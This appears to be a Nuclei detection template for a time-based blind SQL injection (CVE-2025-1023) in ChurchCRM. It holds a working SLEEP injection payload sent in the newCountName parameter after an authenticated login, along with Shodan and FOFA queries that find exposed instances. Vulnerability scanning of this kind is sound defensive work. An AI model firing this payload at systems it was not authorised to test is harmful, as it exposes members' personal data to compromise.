id: CVE-2025-1023

info:
  name: ChurchCRM - SQL Injection
  author: Kazgangap
  severity: critical
  description: |
    A vulnerability exists in ChurchCRM 5.13.0 and prior that allows an attacker to execute arbitrary SQL queries by exploiting a time-based blind SQL Injection vulnerability in the EditEventTypes functionality. The newCountName parameter is directly concatenated into an SQL query without proper sanitization, allowing an attacker to manipulate database queries and execute arbitrary commands, potentially leading to data exfiltration, modification, or deletion.
  impact: |
    Authenticated attackers can execute arbitrary SQL queries through time-based blind SQL injection in ChurchCRM, leading to data exfiltration, modification, or deletion of church member information and potentially complete database compromise.
  remediation: |
    Upgrade to ChurchCRM version 5.13.1 or later that addresses the SQL injection vulnerability.
  reference:
    - https://github.com/ChurchCRM/CRM/issues/7246
    - https://github.com/Kazgangap/cve-poc-garage/blob/main/2025/CVE-2025-1023.md
    - https://nvd.nist.gov/vuln/detail/CVE-2025-1023
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-1023
    cwe-id: CWE-89
    epss-score: 0.02752
    epss-percentile: 0.86271
    cpe: cpe:2.3:a:churchcrm:churchcrm:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    vendor: churchcrm
    product: churchcrm
    shodan-query: http.title:"churchcrm"
    fofa-query: app="churchcrm"
  tags: cve,cve2025,authenticated,churchcrm,sqli,vkev

http:
  - raw:
      - |
        POST /session/begin HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        User={{username}}&Password={{password}}

      - |
        @timeout 30s
        POST /EditEventTypes.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        EN_tyid=1&newEvtName=Test&newEvtStartTime=10:30:00&newCountName=1%27%20AND%20(SELECT%20SLEEP(8))%20AND%20%271%27%3D%271&Action=ADD

    matchers:
      - type: dsl
        dsl:
          - 'duration_2 >= 8'
          - 'status_code_2 == 500'
          - 'contains(body_2, "<title>ChurchCRM: Edit Event Types")'
        condition: and
# digest: 4a0a00473045022100c684ff6500d4da1d2ae77a0777829f902b169f52b22794245c92283a0fb19a1a0220386a0e4ba39bd274dd6f4a7c5264ad38bd1af116979515b7b57e05494f7a7d81:922c64590222798bb761d5b6d8e72950